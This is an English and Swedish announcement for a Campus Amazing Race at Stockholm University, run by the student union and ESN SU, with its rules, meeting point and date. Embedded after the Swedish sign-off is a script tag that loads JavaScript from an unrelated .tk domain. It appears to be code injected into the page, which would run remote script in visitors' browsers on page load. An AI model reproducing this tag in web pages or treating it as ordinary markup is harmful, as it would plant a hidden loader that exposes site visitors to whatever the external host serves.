***SWEDISH VERSION BELOW/ SVENSK VERSION NEDANFÖR***

Do you wanna explore the Stockholm university campus in a way you don't do at guided tours?
Do you wanna meet up, get to know, cooperate with other students and create an amazing team?
Are you ready to compete?

Join Stockholm University Student Union and ESN SU for a Campus Amazing Race! The race will be held Friday 19th of January between 14.00-17.00. We will meet up at the metro stop Universitetet.

To briefly explain the rules: you'll get a map of Stockholm University campus area and the task is to get from place A to B. At each stop you'll get information about the place and a task to complete. Finish this task according to the instructions and win points - and make sure your team is the best!

*You do NOT need a team to join, you can come individually.

** No equipment is needed but wear comfortable and warm clothes and shoes.

/ International Student Coordinators, SUS
ESN SU

-------------------------------------------------------------------------------------------

Är du redo att upptäcka Stockholms universitet och dess olika delar på ett annat sätt? Vill du lära känna andra studenter, göra roliga saker tillsammans och samtidigt tävla mot andra?

Var med på Campus Amazing Race, ett samarbete mellan Stockholms universitets studentkår (SUS) och Erasmus Student Network på Stockholms universitet (ESN SU).

Tävlingen kommer att hållas på fredagen den 19/1 kl. 14.00-17.00. Vi träffas vid tunnelbanestationen Universitetet.

De övergripande reglerna är följande: du kommer att få en karta över Stockholms universitets campusområde och uppgiften är att ta sig från punkt A till B. Vid varje stop får du information om platsen samt en uppgift att utföra. Slutför uppgiften enligt instruktionerna, samla poäng och bli det vinnande laget!

Vi hoppas på att se dig där!

* Du behöver inte ha ett lag för att kunna vara med
** Du behöver inte någon speciell utrustning, men ha på dig bekväma och varma kläder

/ Samordnare för internationella studentern, SUS
ESN SU sektionen<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Date: 
19/01/2018 - 14:00 to 17:00
Place: 
Universitetet metro station
Address: 
Stockholm
Sweden